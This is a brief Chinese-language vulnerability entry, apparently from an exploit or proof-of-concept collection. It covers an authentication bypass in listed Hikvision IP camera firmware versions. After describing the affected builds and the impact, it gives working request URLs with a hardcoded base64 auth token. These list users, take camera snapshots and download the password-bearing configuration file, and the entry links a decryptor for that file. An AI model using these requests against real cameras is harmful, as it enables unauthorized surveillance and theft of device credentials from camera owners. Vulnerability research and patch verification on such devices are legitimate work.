漏洞详情:
在海康威视DS-2CD2xx2F-I Series V5.2.0 build 140721至V5.4.0 build 160530、DS-2CD2xx0F-I Series V5.2.0 build 140721至V5.4.0 build 160401、DS-2CD2xx2FWD Series V5.3.1 build 150410至V5.4.4 build 161125、DS-2CD4x2xFWD Series V5.2.0 build 140721至V5.4.0 build 160414中发现不正确的身份验证问题,DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 build 160421、DS-2DFx Series V5.2.0 build 140805 to V5.4.5 build 160928和DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 build 160106设备。当应用程序没有充分或正确地对用户进行身份验证时,就会出现不正确的身份验证漏洞。这可能允许恶意用户升级其在系统上的权限并获得对敏感信息的访问权限。
漏洞危害:
成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。
利用方式:
查看用户列表:
http://ip:port/Security/users?auth=YWRtaW46MTEK
获取快照:
http://ip:port/onvif-http/snapshot?auth=YWRtaW46MTEK
下载配置账号密码文件:
http://ip:port/System/configurationFile?auth=YWRtaW46MTEK
配置文件解码脚本:
https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor